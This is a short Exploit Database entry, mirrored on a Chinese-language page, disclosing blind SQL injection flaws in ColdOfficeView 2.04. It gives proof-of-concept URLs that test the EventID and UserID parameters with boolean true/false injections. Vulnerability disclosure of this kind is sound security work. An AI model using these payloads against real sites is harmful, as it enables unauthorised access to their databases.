ColdOfficeView 2.04 – Multiple Blind SQL Injections

Exploit Database
4 阅读

作者： mr_me

日期： 2010-09-07
类别：
- webapps
平台：
- windows
来源：https://www.exploit-db.com/exploits/14934/

# ColdGen - coldofficeview v2.04 Remote Blind SQL Injection vulnerabilities
# Vendor: http://www.coldgen.com/
# Found by: mr_me (net-ninja.net)

PoC's
1. http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=[Blind SQLi]
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=1 << true
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=2 << false

2. http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=[Blind SQLi]
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=1 << true
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=2 << false

last Exploits
ColdOfficeView 2.04 – Multiple Blind SQL Injections的更多信息

Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR – Credentials Disclosure：
Vacation Rental Script 4.0 – Cross-Site Request Forgery：
WordPress Plugin bbPress – Multiple Vulnerabilities：
Blaze Apps 1.x – SQL Injection / HTML Injection：
Impulsio CMS – ‘id’ SQL Injection：
Microsoft SharePoint Server 2019 – Remote Code Execution：
Fonts Site Script – Remote File Disclosure：
Simple PHP Agenda 2.2.8 – ‘edit_event.php?eventid’ SQL Injection：